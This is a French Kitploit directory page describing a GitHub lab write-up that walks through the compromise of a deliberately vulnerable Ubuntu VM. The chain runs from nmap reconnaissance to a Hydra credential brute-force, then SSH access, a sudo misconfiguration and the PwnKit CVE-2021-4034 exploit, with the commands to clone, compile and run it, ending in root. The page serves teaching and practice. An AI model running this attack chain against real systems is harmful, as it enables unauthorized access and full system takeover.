Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ubuntu-privesc-lab — Workflow complet de test d'intrusion : brute force de mots de passe, accès SSH et escalade de privilèges (CVE-2021-4034) | Kitploit
Outils/GitHubGitHub/vaibhavkrishna12004/ubuntu-privesc-lab
Escalade de PrivilègesReconnaissanceCartographie RéseauAttaques de Mots de PasseScan de PortsAnalyse des VulnérabilitésExploitationTests d'IntrusionMauvaise Configuration

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Apprentissage et Éducation
Labs et Pratique
GitHubvaibhavkrishna12004/ubuntu-privesc-lab

ubuntu-privesc-lab

Workflow complet de test d'intrusion : brute force de mots de passe, accès SSH et escalade de privilèges (CVE-2021-4034)

Voir le dépôt
19il y a 5 moisPas encore vérifié

ubuntu-privesc-lab

Workflow complet de test d'intrusion : force brute sur les identifiants, accès SSH et escalade de privilèges (CVE-2021-4034)

APERÇU

Ce projet démontre un workflow complet de test d'intrusion contre une machine virtuelle Ubuntu vulnérable. La chaîne d'attaque comprend la reconnaissance, le forçage brutal d'identifiants, l'accès initial et l'escalade de privilèges à l'aide de plusieurs techniques.

OUTILS UTILISÉS

Nmap Hydra SSH Git CVE-2021-4034 (PwnKit)

RECONNAISSANCE

La reconnaissance a été menée à l'aide de Nmap qui a révélé le nombre d'hôtes ouverts dans le réseau spécifique (wifi). nmap < IP du réseau 0/24 > : Ceci a révélé le nombre d'hôtes actifs et leur adresse MAC. Reconnaissance pour trouver la VM 1

Comme observé, la VM fonctionnait dans ORACLE VIRTUAL BOX, nous avons pu déterminer qu'il s'agissait de notre VM vulnérable et l'IP suivante.

Reconnaissance pour la VM 2

Un scan supplémentaire a révélé des ports ouverts vulnérables pour l'attaque.

EXPLOIT PRINCIPAL

En utilisant cela, j'ai tenté une attaque de force brute sur les identifiants avec succès à l'aide de Hydra hydra -l < USERNAME > or -L < File.txt > -p < PASSWORD > or -P < File.txt > < TARGET IP > < PORT >

Hydra pour VM vulnérable

Cette exploitation réussie du mot de passe nous a permis d'utiliser les identifiants pour l'exploitation du port SSH également.

ssh < USERNAME@TARGET IP > Password < exploit password >

Exploitation SSH à l'aide des identifiants obtenus du mot de passe

Cela nous a donné l'accès initial à notre système victime. De plus, la mauvaise configuration de sudo nous a donné un accès complet à root sudo -l : (ALL : ALL) ALL

sudo su a été l'escalade

EXPLOIT SECONDAIRE

Nous avons continué à exploiter le système victime à l'aide de "Pwnkit CVE-2021-4034".

PwnKit (CVE-2021-4034) est une vulnérabilité de sécurité critique découverte début 2022 par l'équipe de recherche Qualys, affectant le framework Polkit sur les systèmes Linux. Il s'agit d'une faille d'escalade de privilèges locale (LPE) qui permet à tout utilisateur standard non privilégié d'obtenir les privilèges root complets (accès administratif) sur un système. La vulnérabilité existe depuis l'introduction de Polkit en 2009 et est considérée comme "triviale" à exploiter, ce qui la rend très dangereuse.

Common Vulnerabilities and Exposures (CVE) est une liste standardisée et publiquement divulguée de vulnérabilités et d'expositions de cybersécurité dans les logiciels et le matériel.

INSTALLATION DE CVE-2021-4034 ET EXPLOITATION DE LA VM

Tout d'abord, j'ai confirmé que le système cible était potentiellement vulnérable en vérifiant la présence et les permissions de pkexec : which pkexec output: ls -la /usr/bin/pkexec Le binaire avait le bit SUID défini, indiquant qu'il s'exécute avec les privilèges root, ce qui en fait une cible viable pour l'exploitation.

Préparer l'environnement

Pour compiler l'exploit, les outils nécessaires ont été installés : sudo apt update sudo apt install git build-essential -y Cela a garanti que le système dispose du compilateur et des dépendances nécessaires. Si l'apt du système a des tâches en arrière-plan en cours d'exécution, tuez-la.

Transférer / Obtenir le code de l'exploit

L'exploit a été cloné directement sur la machine victime : cd /tmp git clone https://github.com/berdav/CVE-2021-4034.git cd CVE-2021-4034 L'utilisation de /tmp évite l'encombrement et reflète un comportement réaliste d'attaquant. Installation de CVE-2021-4034 Installation de Git pour le kit CVE

Compiler l'exploit

L'exploit a été compilé à l'aide de : "make"

Cela a généré l'exécutable nécessaire pour déclencher la vulnérabilité.

Exécuter l'exploit

L'exploit a été exécuté : ./cve-2021-4034

Vérifier l'escalade de privilèges

Après exécution, l'accès root a été confirmé : whoami

Output: root

Exploitation des privilèges et accès à la VM

Cet exploit fonctionne car pkexec gère incorrectement les variables d'environnement, permettant aux attaquants d'exécuter du code arbitraire avec des privilèges élevés.

CONCLUSION

Cet exercice démontre comment un utilisateur apparemment peu privilégié peut escalader vers un contrôle complet du système en exploitant une vulnérabilité connue comme PwnKit (CVE-2021-4034). En combinant l'accès initial via un compromis d'identifiants avec une énumération et une exploitation systématiques, il a été possible d'atteindre l'accès root sans se fier uniquement aux mauvaises configurations. Cela souligne l'importance critique d'une gestion rapide des correctifs et de pratiques de configuration sécurisées. Même une seule vulnérabilité négligée peut conduire à un compromis complet du système, mettant en évidence la nécessité d'évaluations de sécurité continues et de stratégies de défense en profondeur.

Télécharger l’outil